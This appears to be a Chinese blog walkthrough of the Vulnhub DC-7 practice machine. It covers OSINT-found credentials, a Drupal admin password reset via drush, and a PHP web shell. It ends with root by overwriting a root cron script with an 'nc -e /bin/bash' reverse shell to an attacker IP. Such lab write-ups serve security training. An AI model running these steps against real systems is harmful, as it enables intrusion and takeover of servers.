zoukankan      html  css  js  c++  java
  • Vulnhub DC7

    靶机简介

    DC-7是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。虽然这不是一个过度的技术挑战,但也并非易事。虽然这是一个逻辑上的进展,从早期的DC版本(我不会告诉你是哪一个),有一些新的概念涉及,但你需要自己去弄清。:-)如果你需要使用暴力强制或字典攻击,你可能不会成功。你需要做的,就是跳出框框去思考。在盒子外面。:-)这个挑战的最终目标是获得root并阅读唯一的旗帜

    getshell

    老样子,先扫描一下端口

    又是22和80,看到ssh能猜到一会儿可能需要爆破进ssh。访问80

    根据靶机简介和这里的提示,说和之前的靶机DC-1有点新东西,具体新在哪儿呢?多了一个DC7USER

    百度这个关键字

    收集到一对账号密码 dc7user/MdR3xOgB7#dW

    前端登陆没成功,但试了试ssh居然就登进去了。。

    提权

    登陆进去后发现有邮箱信息,cat一下看是什么鬼

    看到X-Cron-Env联想到计划任务提权,具体的任务是啥?是邮件中的这个 Cron <root@dc-7> /opt/scripts/backups.sh,以root身份执行这个计划任务backups.sh。

    那就看看backups.sh

    没做什么事,尝试添加语句进行从而提升权限。但是发现当前用户无法修改,应该是权限原因

    ls -l 查看该文件的权限

    线索来了,文件所属的组是www-data,而且组是有写的权限的,该组的成员是www-data,那我们以www-data登陆不就行了?直接在web目录写shell,但是发现没有权限。这个时候我们想的应该是怎样在前台getshell,获取www-data的权限

    没有权限写入。那就先用drush修改admin密码,然后后台getshell。注意drush命令必须在www目录下使用

    cd /var/www/html
    drush user-password admin --password="admin"
    

    登入后台,添加页面,但是却发现没有php选项

    这啥意思?去官方下载一个加载php的插件

    导入

    然后勾选应用

    现在就可以添加php文件了

    page

    成功添加

    蚁剑连接

    nc反弹shell

    然后尝试修改定时任务,尝试了一下vi,无法移动光标,所以没法用vi写。这个时候换成echo,

    echo "nc -e /bin/bash 192.168.136.129 1234" > backups.sh

    监听1234端口,等待任务执行即可

    nc -lvvp 1234

    查看最后的答案

    总结

    1. 信息收集密码表
    2. drupal后台getshell
    3. groups www-data查看用户组的用户
  • 相关阅读:
    将博客搬至CSDN
    vector iterator not incrementable For information on how your program can cause an an assertion Failure, see the Visual c + + documentation on asserts
    VS2013+opencv2.4.9配置
    数组去重排序
    堆排序理解 完整代码
    dijkstra 两点的最短路径 单源 最短路径
    欧拉回路
    next 前缀字符串
    继续畅通工程
    sql server转移tempdb数据库的物理存放位置
  • 原文地址:https://www.cnblogs.com/tlbjiayou/p/13978804.html
Copyright © 2011-2022 走看看